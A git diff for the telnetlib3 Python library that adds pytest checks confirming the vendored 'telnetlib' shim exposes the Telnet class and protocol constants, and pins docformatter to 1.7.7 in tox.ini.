diff --git a/telnetlib3/tests/test_telnetlib_import.py b/telnetlib3/tests/test_telnetlib_import.py
new file mode 100644
index 00000000..5a3b18e4
--- /dev/null
+++ b/telnetlib3/tests/test_telnetlib_import.py
@@ -0,0 +1,60 @@
+"""Test telnetlib shim and telnetlib3.telnetlib submodule imports."""
+
+# 3rd party
+import pytest
+
+
+@pytest.mark.parametrize(
+ "name, expected_type",
+ [
+ ("Telnet", type),
+ ("IAC", bytes),
+ ("WILL", bytes),
+ ("WONT", bytes),
+ ("DO", bytes),
+ ("DONT", bytes),
+ ("SB", bytes),
+ ("SE", bytes),
+ ("TELNET_PORT", int),
+ ],
+)
+def test_import_telnetlib_names(name, expected_type):
+ """``import telnetlib`` provides expected names and types."""
+ import telnetlib
+
+ assert isinstance(getattr(telnetlib, name), expected_type)
+
+
+def test_telnetlib_Telnet_instantiable():
+ """``Telnet()`` from the shim is instantiable."""
+ from telnetlib import Telnet
+
+ tn = Telnet()
+ assert tn is not None
+ tn.close()
+
+
+def test_import_telnetlib3_telnetlib():
+ """``import telnetlib3.telnetlib`` continues to work."""
+ import telnetlib3.telnetlib
+
+ assert telnetlib3.telnetlib.IAC is not None
+
+
+def test_from_telnetlib3_import():
+ """``from telnetlib3 import Telnet`` continues to work."""
+ from telnetlib3 import IAC, TELNET_PORT, Telnet
+
+ assert IAC is not None
+ assert TELNET_PORT == 23
+ assert callable(Telnet)
+
+
+def test_import_telnetlib_is_vendored_copy():
+ """``import telnetlib`` provides the vendored copy, not stdlib."""
+ import telnetlib as telnetlib_
+
+ import telnetlib3.telnetlib
+
+ assert telnetlib_.IAC == telnetlib3.telnetlib.IAC
+ assert telnetlib_.Telnet is telnetlib3.telnetlib.Telnet
diff --git a/tox.ini b/tox.ini
index f7c33842..ee571a60 100644
--- a/tox.ini
+++ b/tox.ini
@@ -48,7 +48,7 @@ commands =
[testenv:docformatter]
basepython = python3.13
deps =
- docformatter>=1.7.7
+ docformatter==1.7.7
untokenize
commands =
docformatter \
@@ -63,7 +63,7 @@ commands =
[testenv:docformatter_check]
basepython = python3.13
deps =
- docformatter>=1.7.7
+ docformatter==1.7.7
untokenize
commands =
docformatter \